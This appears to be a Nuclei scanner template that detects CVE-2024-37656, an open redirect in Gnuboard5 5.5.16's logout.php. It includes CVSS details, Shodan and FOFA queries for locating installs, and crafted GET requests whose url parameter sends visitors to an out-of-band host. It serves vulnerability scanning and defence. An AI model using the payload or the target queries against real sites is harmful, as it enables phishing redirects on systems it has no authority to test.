漏洞描述
Gnuboard5 5.5.16 contains an open redirect vulnerability caused by insufficient URL parameter verification in bbs/logout.php, letting remote attackers redirect users to arbitrary URLs, exploit requires crafted URL parameter.
id: CVE-2024-37656
info:
name: GnuBoard5 5.5.16 - Open Redirect
author: 0x_Akoko
severity: medium
description: |
Gnuboard5 5.5.16 contains an open redirect vulnerability caused by insufficient URL parameter verification in bbs/logout.php, letting remote attackers redirect users to arbitrary URLs, exploit requires crafted URL parameter.
impact: |
Remote attackers can redirect users to malicious sites, potentially leading to phishing or information theft.
remediation: |
Update to the latest version of Gnuboard5.
reference:
- https://github.com/gnuboard/gnuboard5/issues/318
- https://nvd.nist.gov/vuln/detail/CVE-2024-37656
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N
cvss-score: 6.1
cve-id: CVE-2024-37656
cwe-id: CWE-601
cpe: cpe:2.3:a:sir:gnuboard:5.5.16:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: sir
product: gnuboard
shodan-query: html:"GnuBoard5"
fofa-query: body:"GnuBoard5"
tags: cve,cve2024,redirect,gnuboard5
http:
- method: GET
path:
- "{{BaseURL}}/gnuboard5/bbs/logout.php?url=/\\oast.pro"
- "{{BaseURL}}/bbs/logout.php?url=/\\oast.pro"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*)(?:https?://|//|/\\\\)?[a-zA-Z0-9._@-]*oast\.pro.*$'
- type: status
status:
- 302
# digest: 490a00463044022024c810e2dbb2565f1ee6b0dded88442176834b7c9b93dd9427be490880033aa5022048e1278f47886d3a1a50cf4f1bdb4abde3bfe55c119ac965f983bbc49a463806:922c64590222798bb761d5b6d8e72950